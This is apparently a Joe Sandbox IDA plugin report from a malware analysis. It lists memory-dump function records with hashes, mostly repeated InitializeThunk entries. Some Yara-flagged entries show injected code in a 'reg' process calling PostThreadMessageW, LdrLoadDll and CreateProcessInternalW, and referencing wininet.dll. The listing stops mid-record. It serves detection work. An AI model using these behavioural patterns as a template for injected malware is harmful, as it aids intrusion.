                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1cbbaf8dd4a67dabc4ed6fc412236f6599ce30cbd733f11e877e37b3f1a9e166
                                                • Instruction ID: e9d2cdcbbbc49037cc454e31988fbfef554df4e0d93c9420e146d38b4e59d74a
                                                • Opcode Fuzzy Hash: 1cbbaf8dd4a67dabc4ed6fc412236f6599ce30cbd733f11e877e37b3f1a9e166
                                                • Instruction Fuzzy Hash: 919002A1B01904424140B19C580440A6445A7E1311399C115A4554561C87188955A269
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ed018b0c10118ada896c21731299f428eef61f5ee6001cd5bd895312450a61dc
                                                • Instruction ID: 802ec71dbabcc4a006a0261f5aad904c3d50ebd5e37d0e8c68207e83eb9a9ad7
                                                • Opcode Fuzzy Hash: ed018b0c10118ada896c21731299f428eef61f5ee6001cd5bd895312450a61dc
                                                • Instruction Fuzzy Hash: A49002A1702804034105B19C541461A444A97E0211B59C021E5014591DC62589917125
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d35e887f4203a018af3e68bbccfe4bd48a5d5d32f01abd6d13adabcfff7dfb2e
                                                • Instruction ID: 29bc0c5db9ab6818b12b1ef041842794d9ecaa1823d6df63b4653b45ed07f5ce
                                                • Opcode Fuzzy Hash: d35e887f4203a018af3e68bbccfe4bd48a5d5d32f01abd6d13adabcfff7dfb2e
                                                • Instruction Fuzzy Hash: EB90027170180C02D180B19C540464E044597D1311F99C015A4025655DCB158B5977A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c94a1f0c619cd0f33b69918cf75fb071b1f098cdf2819e43b755a5c90918b8d0
                                                • Instruction ID: 0d5d4d7fb652e933d6ba33416a13338fa92d3556c855ec544043872f4bfa3c78
                                                • Opcode Fuzzy Hash: c94a1f0c619cd0f33b69918cf75fb071b1f098cdf2819e43b755a5c90918b8d0
                                                • Instruction Fuzzy Hash: A790027170584C42D140B19C5404A4A045597D0315F59C011A4064695D97258E55B661
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7a350267988bc1b23fe60cbc53a3f6d84358f385b78eab9705b3d328f5840fa6
                                                • Instruction ID: 9468bbe7002ee507710bd4fe4672ac318ad9979e9cbdcd648ff622c6bf2dabc4
                                                • Opcode Fuzzy Hash: 7a350267988bc1b23fe60cbc53a3f6d84358f385b78eab9705b3d328f5840fa6
                                                • Instruction Fuzzy Hash: 6D900271B0580C02D150B19C541474A044597D0311F59C011A4024655D87558B5576A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d74c4913c5e6a045dbf0ad11ae6ba2c894a2a8983cd339bd6a9c9437accc1337
                                                • Instruction ID: add290cf6b84d430d1ad8531119f0e66ae4f17a1c0064566f813d7f13074038a
                                                • Opcode Fuzzy Hash: d74c4913c5e6a045dbf0ad11ae6ba2c894a2a8983cd339bd6a9c9437accc1337
                                                • Instruction Fuzzy Hash: 50900265711804030105F59C170450B048697D5361359C021F5015551CD72189616121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5446c3304ee1bd0e854c876d35375df9df62d5d888aef6ad7fe75b9d759cefe7
                                                • Instruction ID: 00f39f81a1f7724eccf417e361bc9b492d1215b8bf2fe7738845c83d48b6fc61
                                                • Opcode Fuzzy Hash: 5446c3304ee1bd0e854c876d35375df9df62d5d888aef6ad7fe75b9d759cefe7
                                                • Instruction Fuzzy Hash: D2900265721804020145F59C160450F0885A7D6361399C015F5416591CC72189656321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5b97d83d7cd6122f79cf2abbe0d0b6f61821500d98d7bd2f0ceca2ed18822d3b
                                                • Instruction ID: e1cd2069a059730ebe07098000d4114107cb082b758eb66c964343823df4cfb7
                                                • Opcode Fuzzy Hash: 5b97d83d7cd6122f79cf2abbe0d0b6f61821500d98d7bd2f0ceca2ed18822d3b
                                                • Instruction Fuzzy Hash: E59002A174180842D100B19C5414B0A0445D7E1311F59C015E5064555D8719CD527126
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cfcf42b14794b7c624cce46db86ffa35477d9b8029d587657ac4041b8e30ddb3
                                                • Instruction ID: 8d8e44545d18078c7ee480ab0b9a5c04a4c0a26f668dc8d0f454236ce62aee27
                                                • Opcode Fuzzy Hash: cfcf42b14794b7c624cce46db86ffa35477d9b8029d587657ac4041b8e30ddb3
                                                • Instruction Fuzzy Hash: 9D900261711C0442D200B5AC5C14B0B044597D0313F59C115A4154555CCA1589616521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b76d20f2b6ec9fe062654f75a4f0664d3428403a9755d81da98f0e8af99e3ec6
                                                • Instruction ID: d7c9b9066eef7c42a8dcb64f6f014f14de5d80709509fedd026beeb9dd6c0315
                                                • Opcode Fuzzy Hash: b76d20f2b6ec9fe062654f75a4f0664d3428403a9755d81da98f0e8af99e3ec6
                                                • Instruction Fuzzy Hash: 71900261B01804424140B1AC984490A4445BBE1221759C121A4998551D865989656665
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b5117c75e05bdcbd57560fc6f2b1e8aa42ad1f34381ffa63c64c8e037fc1118b
                                                • Instruction ID: 0c49aa41406bdf85a04977df77e8a88aa2c552000ffb0e95d5f30f116c528a01
                                                • Opcode Fuzzy Hash: b5117c75e05bdcbd57560fc6f2b1e8aa42ad1f34381ffa63c64c8e037fc1118b
                                                • Instruction Fuzzy Hash: 459002A1701C0803D140B59C580460B044597D0312F59C011A6064556E8B298D517135
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 667f89aa90cf600e9bbdd1925af907a49b4af381fc8809b4f18dbf8ad4f178b4
                                                • Instruction ID: 67b0338459e8464f331971a1c424c53eac8c4b4d68221ad791295122d52cf3ee
                                                • Opcode Fuzzy Hash: 667f89aa90cf600e9bbdd1925af907a49b4af381fc8809b4f18dbf8ad4f178b4
                                                • Instruction Fuzzy Hash: B5900261B0180902D101B19C540461A044A97D0251F99C022A5024556ECB258A92B131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a1078fac3d714a8177ca0053bfdf52081897be6e562742149722f0fcb1459130
                                                • Instruction ID: 7a55a79002e563c910ab2b2860a68787bc7c2864769725b4d13abded03ad78a6
                                                • Opcode Fuzzy Hash: a1078fac3d714a8177ca0053bfdf52081897be6e562742149722f0fcb1459130
                                                • Instruction Fuzzy Hash: 7A90026971380402D180B19C640860E044597D1212F99D415A4015559CCA1589696321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 07be760bf95b5feaf640b21bd98612e1cb3a23df228ecad7e5dc11bae70e12a5
                                                • Instruction ID: 5df522d8126148aab4d445be0c5cd3ca67153e71abffbd8fc0804d6ff60afc50
                                                • Opcode Fuzzy Hash: 07be760bf95b5feaf640b21bd98612e1cb3a23df228ecad7e5dc11bae70e12a5
                                                • Instruction Fuzzy Hash: D890026170180403D140B19C641860A4445E7E1311F59D011E4414555CDA1589566222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ae51beeb5285a9133024435cbd516468403b03d5ed43862da4d3aaf5bb992488
                                                • Instruction ID: aa3f9e4d35fccab68a5a7ce70fa5fbf021b1e2d4aa00c15e4689c782faa7e707
                                                • Opcode Fuzzy Hash: ae51beeb5285a9133024435cbd516468403b03d5ed43862da4d3aaf5bb992488
                                                • Instruction Fuzzy Hash: A0900261742845525545F19C540450B4446A7E0251799C012A5414951C86269956E621
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6d7f457d6199042e502e2ac0c245d0c8de30e3e21a0bf44669ca6593869e8218
                                                • Instruction ID: e89b3da8b91ff66f618db3abc87008850682b9d9e4b8db5f6d18b06c31ae803c
                                                • Opcode Fuzzy Hash: 6d7f457d6199042e502e2ac0c245d0c8de30e3e21a0bf44669ca6593869e8218
                                                • Instruction Fuzzy Hash: 0490027170180813D111B19C550470B044997D0251F99C412A4424559D97568A52B121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1bddd35bbd90b93d7214d4604dcc70da745349504d170f9327ec8d8486624c91
                                                • Instruction ID: 9eed2a485d0e5c12ecb6864b56686be1173e9e836e3aee4449feb31df17441eb
                                                • Opcode Fuzzy Hash: 1bddd35bbd90b93d7214d4604dcc70da745349504d170f9327ec8d8486624c91
                                                • Instruction Fuzzy Hash: 0B90027170188C02D110B19C940474E044597D0311F5DC411A8424659D879589917121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8141ccf6ca33ab23e4c91d1fe9c7eeacf40085321322172cbf277f630cefbafb
                                                • Instruction ID: 4205b72566c003a10762c1f46554ed5285117d5b5517158943a6364464ae97e0
                                                • Opcode Fuzzy Hash: 8141ccf6ca33ab23e4c91d1fe9c7eeacf40085321322172cbf277f630cefbafb
                                                • Instruction Fuzzy Hash: 4590027170180C42D100B19C5404B4A044597E0311F59C016A4124655D8715C9517521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8fa53d73ff2e1b269d716ac249b6fe28e5e6fe2b61ab82d5e3f956a2735cab99
                                                • Instruction ID: d75386badfaae3a093841e68bafaf30e6c61d163710348ff55d3cf8949a56daf
                                                • Opcode Fuzzy Hash: 8fa53d73ff2e1b269d716ac249b6fe28e5e6fe2b61ab82d5e3f956a2735cab99
                                                • Instruction Fuzzy Hash: 1F90027170180802D100B5DC640864A044597E0311F59D011A9024556EC76589917131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 27483a34db8242fdefff7182fbb1eb5fb227ecdb5f6684428306dc35d37928b9
                                                • Instruction ID: 2808f6e77d7b1143dde73ca5dc3f5950d17cc3a6e5b7219e8075574b13fab64b
                                                • Opcode Fuzzy Hash: 27483a34db8242fdefff7182fbb1eb5fb227ecdb5f6684428306dc35d37928b9
                                                • Instruction Fuzzy Hash: B5900271B0590802D100B19C551470A144597D0211F69C411A4424569D87958A5175A2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e9271e2754fc8dffdd98d4990fface8b89d2c807416b0af8062c039a93135c3a
                                                • Instruction ID: 4abb33c70d87c357611839b9eda23d1db38afc40d0a049b8a15851c3dcf4a71f
                                                • Opcode Fuzzy Hash: e9271e2754fc8dffdd98d4990fface8b89d2c807416b0af8062c039a93135c3a
                                                • Instruction Fuzzy Hash: 4390026174585502D150B19C540461A4445B7E0211F59C021A4814595D865589557221
                                                Control-flow Graph
                                                control_flow_graph 647 2ce0d08-2ce0d0a 648 2ce0d0c-2ce0d0e 647->648 649 2ce0d25-2ce0d7a call 2cfa1f0 call 2cfac00 call 2ce4660 call 2cd1410 call 2cf14c0 647->649 650 2ce0d7e-2ce0d8b PostThreadMessageW 648->650 651 2ce0d10-2ce0d22 648->651 654 2ce0d9a-2ce0da0 649->654 664 2ce0d7c 649->664 653 2ce0d8d-2ce0d97 650->653 650->654 651->649 653->654 664->650
                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 02CE0D87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: 58d9228eb410093aba107297153175491df87c43f7b9c8789040e87b18c8d984
                                                • Instruction ID: 4edefea7cacd946db80ab6067499a2aef14acf569fbb2a2b59d599bc35195505
                                                • Opcode Fuzzy Hash: 58d9228eb410093aba107297153175491df87c43f7b9c8789040e87b18c8d984
                                                • Instruction Fuzzy Hash: A911E5B2D0020C7AEB00AAE18C81DEFBB6DDF85798F448069FA1477100D2B55F064BF1
                                                Control-flow Graph
                                                APIs
                                                • PostThreadMessageW.USER32(-02n08K,00000111,00000000,00000000), ref: 02CE0D87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: -02n08K$-02n08K
                                                • API String ID: 1836367815-2765054273
                                                • Opcode ID: f7bde5019313a3fb4120021813f2a098691fa0f7731b0cb77547ce2e9577b4a8
                                                • Instruction ID: 3a98d35c6a07c7b85e7ee71503d6b0518a9139c059450152d56dc6d9473a497f
                                                • Opcode Fuzzy Hash: f7bde5019313a3fb4120021813f2a098691fa0f7731b0cb77547ce2e9577b4a8
                                                • Instruction Fuzzy Hash: B30184B2D0025CBAEB10AAE58C81DEFBB7CDF81694F458065FA18A7140D6755E064BF1
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 02CF2E5D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: d81da4ade7945dfd02c8d9f993767653c80a4975a00db775332c4158b02ee551
                                                • Instruction ID: 3eda0dbbf0682a6d23c500f8fa72d7b062be6b26dd8d515d6be5fa4ed3d3b46d
                                                • Opcode Fuzzy Hash: d81da4ade7945dfd02c8d9f993767653c80a4975a00db775332c4158b02ee551
                                                • Instruction Fuzzy Hash: E4316BB1600605ABC764DF64DC80FEBFBA8AB88704F50851DAA595B280E770A644CBA5
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02CEEE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 139d33829c5e45b6fc538b108dbf4e786499b65bcf5cde22b187e87322c88bcf
                                                • Instruction ID: f60efcf77b4a0063ee120d06ebddb6e7fe517e1ba730575ad3ecb4e4ea90a0c0
                                                • Opcode Fuzzy Hash: 139d33829c5e45b6fc538b108dbf4e786499b65bcf5cde22b187e87322c88bcf
                                                • Instruction Fuzzy Hash: 8B3132B6A0060A9FDF00DFD8C8809EEB7B9FF88314F108559E516EB214D775EA45CBA1
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02CEEE37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: b6d9ab6b87389ba439d2d1c5eb5731c3c39368f2096b425f8e524e04009d09b3
                                                • Instruction ID: 7d8111851bca9aaa38668b6114da840083c61cec1b26d8776745e81b792b1dda
                                                • Opcode Fuzzy Hash: b6d9ab6b87389ba439d2d1c5eb5731c3c39368f2096b425f8e524e04009d09b3
                                                • Instruction Fuzzy Hash: 3B3132B5A0060A9FDB00DFD8C8809EFB7B9BF88314F108559E506EB214D775EE45CBA1
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE46D2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction ID: 376e94f542a29e9674012238e8f4d224c6b20e982243315d9fb4a56260609c46
                                                • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                                • Instruction Fuzzy Hash: 43011AB5E4020DABDF54EBA4DC41FDEB3B99B44708F0081A5AA099B240F631EB58DB91
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02CE7F43,00000010,?,?,?,00000044,?,00000010,02CE7F43,?,?,?), ref: 02CF86B0
                                                Memory Dump Source
